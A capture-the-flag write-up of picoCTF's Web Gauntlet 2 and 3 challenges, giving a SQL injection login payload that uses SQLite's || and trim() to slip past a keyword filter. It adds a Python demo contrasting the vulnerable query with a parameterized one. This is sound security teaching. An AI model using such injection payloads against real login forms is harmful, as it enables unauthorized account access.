# Web Gauntlet (170 + 300)

## Problem

### Web Gauntlet 2

This website looks familiar... Log in as admin

Site: <http://mercury.picoctf.net:35178/>

Filter: <http://mercury.picoctf.net:35178/filter.php>

### Web Gauntlet 3

Last time, I promise! Only 25 characters this time.

## Solution

### Web Gauntlet 2

* Username: `adm' || trim('in',`
* Password: `) || '`

This will cause the following SQL statement to be executed:

```
SELECT username, password FROM users WHERE username='adm' || trim('in',' AND password=') || ''
```

Notes:

* `||` is the SQLite concatenation operator.
* `trim(string, characters)` removes from both ends of `string` any character that appears in `characters`. Here it only serves to neutralise the `AND` condition by swallowing `' AND password='` as a string argument. None of the characters in `' AND password='` is `i` or lowercase `n` (the comparison is case-sensitive), so `trim('in',' AND password=')` simply returns `'in'`.
* The above SQL statement is thus equivalent to:

```
SELECT username, password FROM users WHERE username='adm' || 'in' || ''
```

Which is equivalent to:

```
SELECT username, password FROM users WHERE username='admin'
```
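The same statement reproduced against an in-memory SQLite database, next to a parameterized version of the login query that treats the two fields as data. This is an added example, not the challenge's source code. The query template, the `login_concat`/`login_bound` helper names and the stored password are assumptions; only the `users` table, its two columns and the two field values come from the write-up.

```python
import sqlite3

# The two field values from this write-up.
USERNAME = "adm' || trim('in',"
PASSWORD = ") || '"

def make_db():
    """Constructed sample data: the real password is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    """Vulnerable: input is spliced into the SQL text (assumed template)."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return sql, db.execute(sql).fetchone()

def login_bound(db, username, password):
    """Hardened: placeholders bind input as values, so quotes, || and
    trim( are compared literally and never parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()

def trim_check(db):
    """The trim() call from the notes, evaluated on its own."""
    return db.execute("SELECT trim('in', ' AND password=')").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    sql, row = login_concat(db, USERNAME, PASSWORD)
    print(sql)                                  # statement shown in the write-up
    print("concatenated query row:", row)       # admin row returned without the password
    print("trim result:", trim_check(db))
    print("bound query row:", login_bound(db, USERNAME, PASSWORD))
```

With bound parameters the keyword filter is no longer the only control: the same input matches no row because it is compared as a literal username.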

We can now check out the filter page:

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-574deac2356d2078b422709cbd1f10846b778986%2Fcfd745ed128d4fdea484d02e74f76170.png?alt=media)

### Web Gauntlet 3

The length limit is down from 35 characters to 25 characters. The solution above works for this challenge as well!

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-7eb70a7c7f62fef5550b3c38b93a4199612dcb28%2F961bccf829724357b9ee05d27beec0fb.png?alt=media)
